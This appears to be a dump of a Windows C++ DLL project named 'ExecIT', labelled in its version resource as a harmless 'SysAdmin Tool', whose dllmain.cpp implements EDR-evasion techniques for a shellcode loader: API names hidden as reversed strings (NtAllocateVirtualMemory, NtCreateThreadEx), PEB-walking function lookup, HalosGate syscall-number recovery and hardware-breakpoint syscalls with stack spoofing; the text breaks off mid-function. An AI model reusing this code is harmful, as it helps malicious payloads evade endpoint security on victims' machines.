[
  {
    "path": "ExecIT/ExecIT.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <VCProjectVersion>16.0</VCProjectVersion>\n    <Keyword>Win32Proj</Keyword>\n    <ProjectGuid>{0f7a1d0f-1c36-4be6-9c0b-39a15688cd7a}</ProjectGuid>\n    <RootNamespace>ExecIT</RootNamespace>\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup 
Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" 
Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <TargetName>ExecIT</TargetName>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>WIN32;_DEBUG;EXECIT_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableUAC>false</EnableUAC>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>WIN32;NDEBUG;EXECIT_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableUAC>false</EnableUAC>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      
<WarningLevel>Level3</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>_DEBUG;EXECIT_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableUAC>false</EnableUAC>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>NDEBUG;EXECIT_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n      <PrecompiledHeader>Use</PrecompiledHeader>\n      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>\n      <Optimization>Disabled</Optimization>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n    </ClCompile>\n    <Link>\n      <SubSystem>Windows</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EnableUAC>false</EnableUAC>\n      <Version>1.2</Version>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClInclude Include=\"framework.h\" />\n    <ClInclude Include=\"pch.h\" />\n    <ClInclude Include=\"resource.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"dllmain.cpp\" />\n    <ClCompile Include=\"pch.cpp\">\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">Create</PrecompiledHeader>\n      <PrecompiledHeader 
Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">Create</PrecompiledHeader>\n      <PrecompiledHeader Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">Create</PrecompiledHeader>\n    </ClCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"ProjectName.rc\" />\n  </ItemGroup>\n  <ItemGroup>\n    <None Include=\"test1.bin\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "ExecIT/ExecIT.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"framework.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"pch.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"resource.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"dllmain.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"pch.cpp\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"ProjectName.rc\">\n      <Filter>Resource Files</Filter>\n    </ResourceCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <None Include=\"test1.bin\">\n      <Filter>Resource Files</Filter>\n    </None>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "ExecIT/ExecIT.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <PropertyGroup />\n</Project>"
  },
  {
    "path": "ExecIT/ProjectName.rc",
    "content": "#include <windows.h>\n\nLANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US\n\n/////////////////////////////////////////////////////////////////////// \n// \n// Version\n// \n\nVS_VERSION_INFO VERSIONINFO\n FILEVERSION 1,0,0,1\n PRODUCTVERSION 1,0,0,1\n FILEFLAGSMASK 0x3fL\n#ifdef _DEBUG\n FILEFLAGS 0x1L\n#else\n FILEFLAGS 0x0L\n#endif\n FILEOS 0x40004L\n FILETYPE 0x2L\n FILESUBTYPE 0x0L\nBEGIN\n    BLOCK \"StringFileInfo\"\n    BEGIN\n        BLOCK \"040904b0\"\n        BEGIN\n            VALUE \"Comments\", \"Usefor for SysAdmins\"\n            VALUE \"CompanyName\", \"Max Power Inc\"\n            VALUE \"FileDescription\", \"SysAdmin Tool 123\"\n            VALUE \"FileVersion\", \"1, 0, 0, 5\"\n            VALUE \"InternalName\", \"ExecIT\"\n            VALUE \"LegalCopyright\", \"Copyright (C) Max Power Inc 2024\"\n            VALUE \"OriginalFilename\", \"ExecIT.dll\"\n            VALUE \"ProductName\", \"ExecIT\"\n            VALUE \"ProductVersion\", \"1, 0, 0, 5\"\n        END\n    END\n    BLOCK \"VarFileInfo\"\n    BEGIN\n        VALUE \"Translation\", 0x409, 1200\n    END\nEND"
  },
  {
    "path": "ExecIT/dllmain.cpp",
    "content": "#include <iostream>\n#include <fstream>\n#include \"Windows.h\"\n#include <inttypes.h>\n#include \"pch.h\"\n\n\n\n#define SIZEOF(x) sizeof(x) - 1\n\n#pragma region Defines\n\n#define HWSYSCALLS_DEBUG 0\n#define UP -32\n#define DOWN 32\n#define STACK_ARGS_LENGTH 8\n#define STACK_ARGS_RSP_OFFSET 0x28\n#define X64_PEB_OFFSET 0x60\n\n#pragma endregion\n\n#pragma region Macros\n\n#if HWSYSCALLS_DEBUG == 0\n#define DEBUG_PRINT( STR, ... )\n#else\n#define DEBUG_PRINT( STR, ... ) printf(STR, __VA_ARGS__ ); \n#endif\n\n#pragma endregion\n\n#pragma region Type Defintions\n\ntypedef struct _UNICODE_STRING {\n    USHORT Length;\n    USHORT MaximumLength;\n    PWSTR  Buffer;\n} UNICODE_STRING, * PUNICODE_STRING;\n\ntypedef struct _RTL_USER_PROCESS_PARAMETERS {\n    BYTE           Reserved1[16];\n    PVOID          Reserved2[10];\n    UNICODE_STRING ImagePathName;\n    UNICODE_STRING CommandLine;\n} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;\n\ntypedef struct _PEB_LDR_DATA {\n    BYTE       Reserved1[8];\n    PVOID      Reserved2[3];\n    LIST_ENTRY InMemoryOrderModuleList;\n} PEB_LDR_DATA, * PPEB_LDR_DATA;\n\ntypedef struct _LDR_DATA_TABLE_ENTRY {\n    PVOID Reserved1[2];\n    LIST_ENTRY InMemoryOrderLinks;\n    PVOID Reserved2[2];\n    PVOID DllBase;\n    PVOID EntryPoint;\n    PVOID Reserved3;\n    UNICODE_STRING FullDllName;\n    BYTE Reserved4[8];\n    PVOID Reserved5[3];\n    union {\n        ULONG CheckSum;\n        PVOID Reserved6;\n    };\n    ULONG TimeDateStamp;\n} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;\n\ntypedef struct _PEB {\n    BYTE Reserved1[2];\n    BYTE BeingDebugged;\n    BYTE Reserved2[21];\n    PPEB_LDR_DATA LoaderData;\n    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;\n    BYTE Reserved3[520];\n    PVOID PostProcessInitRoutine;\n    BYTE Reserved4[136];\n    ULONG SessionId;\n} PEB, * PPEB;\n\ntypedef BOOL(WINAPI* GetThreadContext_t)(\n    _In_ HANDLE hThread,\n    _Inout_ LPCONTEXT lpContext\n    );\n\ntypedef 
BOOL(WINAPI* SetThreadContext_t)(\n    _In_ HANDLE hThread,\n    _In_ CONST CONTEXT* lpContext\n    );\n\n#pragma endregion\n\n#pragma region Function Declerations\n\nBOOL MaskCompare(const BYTE* pData, const BYTE* bMask, const char* szMask);\nDWORD_PTR FindPattern(DWORD_PTR dwAddress, DWORD dwLen, PBYTE bMask, PCHAR szMask);\nDWORD_PTR FindInModule(LPCSTR moduleName, PBYTE bMask, PCHAR szMask);\nUINT64 GetModuleAddress(LPWSTR sModuleName);\nUINT64 GetSymbolAddress(UINT64 moduleBase, const char* functionName);\nUINT64 PrepareSyscall(char* functionName);\nbool SetMainBreakpoint();\nDWORD64 FindSyscallNumber(DWORD64 functionAddress);\nDWORD64 FindSyscallReturnAddress(DWORD64 functionAddress, WORD syscallNumber);\nLONG HWSyscallExceptionHandler(EXCEPTION_POINTERS* ExceptionInfo);\nbool InitHWSyscalls();\nbool DeinitHWSyscalls();\n\n#pragma endregion\n\n#pragma region GlobalVariables\n\nPVOID exceptionHandlerHandle;\nHANDLE myThread;\nHANDLE hNtdll;\nUINT64 ntFunctionAddress;\nUINT64 k32FunctionAddress;\nUINT64 retGadgetAddress;\nUINT64 stackArgs[STACK_ARGS_LENGTH];\nUINT64 callRegGadgetAddress;\nUINT64 callRegGadgetAddressRet;\nchar callRegGadgetValue;\nUINT64 regBackup;\n\n#pragma endregion\n\n\n#pragma region BinaryPatternMatching\n\n\n\n\n\ntypedef struct _OBJECT_ATTRIBUTES\n{\n\tULONG           Length;\n\tHANDLE          RootDirectory;\n\tPUNICODE_STRING ObjectName;\n\tULONG           Attributes;\n\tPVOID           SecurityDescriptor;\n\tPVOID           SecurityQualityOfService;\n} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;\n\n\n\n\ntypedef NTSTATUS(NTAPI* NtAllocateVirtualMemory_t)(\n\tHANDLE             ProcessHandle,\n\tPVOID* BaseAddress,\n\tULONG              ZeroBits,\n\tPULONG             RegionSize,\n\tULONG              AllocationType,\n\tULONG              Protect\n\t);\n\ntypedef NTSTATUS(NTAPI* NtProtectVirtualMemory_t)(\n\tIN HANDLE               ProcessHandle,\n\tIN OUT PVOID* BaseAddress,\n\tIN OUT PULONG           NumberOfBytesToProtect,\n\tIN ULONG  
              NewAccessProtection,\n\tOUT PULONG              OldAccessProtection\n\t);\n\ntypedef struct _IO_STATUS_BLOCK {\n\tunion {\n\t\tNTSTATUS Status;\n\t\tPVOID    Pointer;\n\t};\n\tULONG_PTR Information;\n} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;\n\ntypedef VOID(NTAPI* PIO_APC_ROUTINE)(\n\tIN PVOID ApcContext,\n\tIN PIO_STATUS_BLOCK IoStatusBlock,\n\tIN ULONG Reserved\n\t);\n\n\ntypedef NTSTATUS(NTAPI* NtReadFile_t)(\n\tIN    HANDLE           FileHandle,\n\tIN OPTIONAL HANDLE           Event,\n\tIN OPTIONAL PIO_APC_ROUTINE  ApcRoutine,\n\tIN OPTIONAL PVOID            ApcContext,\n\tOUT    PIO_STATUS_BLOCK IoStatusBlock,\n\tOUT    PVOID            Buffer,\n\tIN     ULONG            Length,\n\tIN OPTIONAL PLARGE_INTEGER   ByteOffset,\n\tIN OPTIONAL PULONG           Key\n\t);\n\ntypedef NTSTATUS(NTAPI* NtCreateThreadEx_t)(\n\tOUT PHANDLE hThread,\n\tIN ACCESS_MASK DesiredAccess,\n\tIN PVOID ObjectAttributes,\n\tIN HANDLE ProcessHandle,\n\tIN PVOID lpStartAddress,\n\tIN PVOID lpParameter,\n\tIN ULONG Flags,\n\tIN SIZE_T StackZeroBits,\n\tIN SIZE_T SizeOfStackCommit,\n\tIN SIZE_T SizeOfStackReserve,\n\tOUT PVOID lpBytesBuffer);\n\ntypedef NTSTATUS(NTAPI* NtWriteVirtualMemory)(\n\tIN HANDLE pHandle,\n\tIN PVOID baseAddress,\n\tIN LPCVOID lpBuffer,\n\tIN SIZE_T nSize,\n\tOUT SIZE_T* lpNumberOfBytesWritten\n\t);\n\ntypedef NTSTATUS(NTAPI* NtWaitForSingleObject)(\n\tIN HANDLE Handle,\n\tIN BOOLEAN Alertable,\n\tIN PLARGE_INTEGER Timeout\n\t);\n\nvoid reverseStr(char* str, int nSize)\n{\n\n\t// Swap character starting from two\n\t// corners\n\tfor (int i = 0; i < nSize / 2; i++)\n\t\tstd::swap(str[i], str[nSize - i - 1]);\n\treturn;\n}\n\n\nchar cNtAllocateVirtualMemory[] = \"yromeMlautriVetacollAtN\";\nchar cNtCreateThreadEx[] = \"xEdaerhTetaerCtN\";\nchar cNtWaitForSingleObject[] = \"tcejbOelgniSroFtiaWtN\";\n\n\nchar kernelbase[] = \"lld.esablenrek\";\nchar getContext[] = \"txetnoCdaerhTteG\";\nchar setContext[] = \"txetnoCdaerhTteS\";\n\nvoid reverseStr2(char* str, 
int nSize)\n{\n\n    // Swap character starting from two\n    // corners\n    for (int i = 0; i < nSize / 2; i++)\n        std::swap(str[i], str[nSize - i - 1]);\n    return;\n}\n\nBOOL MaskCompare(const BYTE* pData, const BYTE* bMask, const char* szMask)\n{\n    for (; *szMask; ++szMask, ++pData, ++bMask)\n        if (*szMask == 'x' && *pData != *bMask)\n            return FALSE;\n    return TRUE;\n}\n\nDWORD_PTR FindPattern(DWORD_PTR dwAddress, DWORD dwLen, PBYTE bMask, PCHAR szMask)\n{\n    for (DWORD i = 0; i < dwLen; i++)\n        if (MaskCompare((PBYTE)(dwAddress + i), bMask, szMask))\n            return (DWORD_PTR)(dwAddress + i);\n\n    return 0;\n}\n\nDWORD_PTR FindInModule(LPCSTR moduleName, PBYTE bMask, PCHAR szMask)\n{\n    DWORD_PTR dwAddress = 0;\n    PIMAGE_DOS_HEADER imageBase = (PIMAGE_DOS_HEADER)GetModuleHandleA(moduleName);\n\n    if (!imageBase)\n        return 0;\n\n    DWORD_PTR sectionOffset = (DWORD_PTR)imageBase + imageBase->e_lfanew + sizeof(IMAGE_NT_HEADERS);\n\n    if (!sectionOffset)\n        return 0;\n\n    PIMAGE_SECTION_HEADER textSection = (PIMAGE_SECTION_HEADER)(sectionOffset);\n    dwAddress = FindPattern((DWORD_PTR)imageBase + textSection->VirtualAddress, textSection->SizeOfRawData, bMask, szMask);\n    return dwAddress;\n}\n\n#pragma endregion\n\n#pragma region PEBGetProcAddress\n\nUINT64 GetModuleAddress(LPWSTR moduleName) {\n    PPEB peb = (PPEB)__readgsqword(X64_PEB_OFFSET);\n    LIST_ENTRY* ModuleList = NULL;\n\n    if (!moduleName)\n        return 0;\n\n    for (LIST_ENTRY* pListEntry = peb->LoaderData->InMemoryOrderModuleList.Flink;\n        pListEntry != &peb->LoaderData->InMemoryOrderModuleList;\n        pListEntry = pListEntry->Flink) {\n\n        PLDR_DATA_TABLE_ENTRY pEntry = CONTAINING_RECORD(pListEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);\n\n        if (wcsstr(pEntry->FullDllName.Buffer, moduleName)) {\n            return (UINT64)pEntry->DllBase;\n        }\n    }\n    return 0;\n}\n\nUINT64 
GetSymbolAddress(UINT64 moduleBase, const char* functionName) {\n    UINT64 functionAddress = 0;\n    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)moduleBase;\n\n    // Checking that the image is valid PE file.\n    if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) {\n        return 0;\n    }\n\n    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)(moduleBase + dosHeader->e_lfanew);\n\n    if (ntHeaders->Signature != IMAGE_NT_SIGNATURE) {\n        return functionAddress;\n    }\n\n    IMAGE_OPTIONAL_HEADER optionalHeader = ntHeaders->OptionalHeader;\n\n    if (optionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress == 0) {\n        return functionAddress;\n    }\n\n    // Iterating the export directory.\n    PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)(moduleBase + optionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);\n\n    DWORD* addresses = (DWORD*)(moduleBase + exportDirectory->AddressOfFunctions);\n    WORD* ordinals = (WORD*)(moduleBase + exportDirectory->AddressOfNameOrdinals);\n    DWORD* names = (DWORD*)(moduleBase + exportDirectory->AddressOfNames);\n\n    for (DWORD j = 0; j < exportDirectory->NumberOfNames; j++) {\n        if (_stricmp((char*)(moduleBase + names[j]), functionName) == 0) {\n            functionAddress = moduleBase + addresses[ordinals[j]];\n            break;\n        }\n    }\n\n    return functionAddress;\n}\n\n#pragma endregion\n\n#pragma region HalosGate\n\nDWORD64 FindSyscallNumber(DWORD64 functionAddress) {\n    // @sektor7 - RED TEAM Operator: Windows Evasion course - https://blog.sektor7.net/#!res/2021/halosgate.md\n    WORD syscallNumber = 0;\n\n    for (WORD idx = 1; idx <= 500; idx++) {\n        // check neighboring syscall down\n        if (*((PBYTE)functionAddress + idx * DOWN) == 0x4c\n            && *((PBYTE)functionAddress + 1 + idx * DOWN) == 0x8b\n            && *((PBYTE)functionAddress + 2 + idx * DOWN) == 0xd1\n            && *((PBYTE)functionAddress + 3 
+ idx * DOWN) == 0xb8\n            && *((PBYTE)functionAddress + 6 + idx * DOWN) == 0x00\n            && *((PBYTE)functionAddress + 7 + idx * DOWN) == 0x00) {\n            BYTE high = *((PBYTE)functionAddress + 5 + idx * DOWN);\n            BYTE low = *((PBYTE)functionAddress + 4 + idx * DOWN);\n\n            syscallNumber = (high << 8) | low - idx;\n            break;\n        }\n\n        // check neighboring syscall up\n        if (*((PBYTE)functionAddress + idx * UP) == 0x4c\n            && *((PBYTE)functionAddress + 1 + idx * UP) == 0x8b\n            && *((PBYTE)functionAddress + 2 + idx * UP) == 0xd1\n            && *((PBYTE)functionAddress + 3 + idx * UP) == 0xb8\n            && *((PBYTE)functionAddress + 6 + idx * UP) == 0x00\n            && *((PBYTE)functionAddress + 7 + idx * UP) == 0x00) {\n            BYTE high = *((PBYTE)functionAddress + 5 + idx * UP);\n            BYTE low = *((PBYTE)functionAddress + 4 + idx * UP);\n\n            syscallNumber = (high << 8) | low + idx;\n            break;\n        }\n\n    }\n\n    if (syscallNumber == 0)\n\n        return syscallNumber;\n}\n\nDWORD64 FindSyscallReturnAddress(DWORD64 functionAddress, WORD syscallNumber) {\n    // @sektor7 - RED TEAM Operator: Windows Evasion course - https://blog.sektor7.net/#!res/2021/halosgate.md\n    DWORD64 syscallReturnAddress = 0;\n\n    for (WORD idx = 1; idx <= 32; idx++) {\n        if (*((PBYTE)functionAddress + idx) == 0x0f && *((PBYTE)functionAddress + idx + 1) == 0x05) {\n            syscallReturnAddress = (DWORD64)((PBYTE)functionAddress + idx);\n            break;\n        }\n    }\n\n    if (syscallReturnAddress == 0)\n\n        return syscallReturnAddress;\n}\n\n#pragma endregion\n\nUINT64 PrepareSyscall(char* functionName) {\n    return ntFunctionAddress;\n}\n\nbool SetMainBreakpoint() {\n    // Dynamically find the GetThreadContext and SetThreadContext functions\n    reverseStr2(getContext, SIZEOF(getContext));\n    GetThreadContext_t pGetThreadContext = 
(GetThreadContext_t)GetSymbolAddress(GetModuleAddress((LPWSTR)L\"KERN\"), getContext);\n    reverseStr2(setContext, SIZEOF(setContext));\n    SetThreadContext_t pSetThreadContext = (SetThreadContext_t)GetSymbolAddress(GetModuleAddress((LPWSTR)L\"KERN\"), setContext);\n\n    DWORD old = 0;\n\n    CONTEXT ctx = { 0 };\n    ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;\n\n    // Get current thread context\n    pGetThreadContext(myThread, &ctx);\n\n    // Set hardware breakpoint on PrepareSyscall function\n    ctx.Dr0 = (UINT64)&PrepareSyscall;\n    ctx.Dr7 |= (1 << 0);\n    ctx.Dr7 &= ~(1 << 16);\n    ctx.Dr7 &= ~(1 << 17);\n    ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;\n\n    // Apply the modified context to the current thread\n    if (!pSetThreadContext(myThread, &ctx)) {\n        return false;\n    }\n\n    return true;\n}\n\nLONG HWSyscallExceptionHandler(EXCEPTION_POINTERS* ExceptionInfo) {\n    if (ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP) {\n        if (ExceptionInfo->ContextRecord->Rip == (DWORD64)&PrepareSyscall) {\n\n            // Find the address of the syscall function in ntdll we got as the first argument of the PrepareSyscall function\n            ntFunctionAddress = GetSymbolAddress((UINT64)hNtdll, (const char*)(ExceptionInfo->ContextRecord->Rcx));\n\n            // Move breakpoint to the NTAPI function;\n            ExceptionInfo->ContextRecord->Dr0 = ntFunctionAddress;\n        }\n        else if (ExceptionInfo->ContextRecord->Rip == (DWORD64)ntFunctionAddress) {\n\n            // Create a new stack to spoof the kernel32 function address\n            // The stack size will be 0x70 which is compatible with the RET_GADGET we found.\n            // sub rsp, 70\n            ExceptionInfo->ContextRecord->Rsp -= 0x70;\n            // mov rsp, REG_GADGET_ADDRESS\n            *(PULONG64)(ExceptionInfo->ContextRecord->Rsp) = retGadgetAddress;\n\n            // Copy the stack arguments from the original stack\n            for 
(size_t idx = 0; idx < STACK_ARGS_LENGTH; idx++)\n            {\n                const size_t offset = idx * STACK_ARGS_LENGTH + STACK_ARGS_RSP_OFFSET;\n                *(PULONG64)(ExceptionInfo->ContextRecord->Rsp + offset) = *(PULONG64)(ExceptionInfo->ContextRecord->Rsp + offset + 0x70);\n            }\n\n            DWORD64 pFunctionAddress = ExceptionInfo->ContextRecord->Rip;\n\n            char nonHookedSyscallBytes[] = { 0x4C,0x8B,0xD1,0xB8 };\n            if (FindPattern(pFunctionAddress, 4, (PBYTE)nonHookedSyscallBytes, (PCHAR)\"xxxx\")) {\n            }\n            else {\n\n\n                WORD syscallNumber = FindSyscallNumber(pFunctionAddress);\n\n                if (syscallNumber == 0) {\n                    ExceptionInfo->ContextRecord->Dr0 = callRegGadgetAddressRet;\n                    return EXCEPTION_CONTINUE_EXECUTION;\n                }\n\n                DWORD64 syscallReturnAddress = FindSyscallReturnAddress(pFunctionAddress, syscallNumber);\n\n                if (syscallReturnAddress == 0) {\n                    ExceptionInfo->ContextRecord->Dr0 = callRegGadgetAddressRet;\n                    return EXCEPTION_CONTINUE_EXECUTION;\n                }\n\n                // mov r10, rcx\n                ExceptionInfo->ContextRecord->R10 = 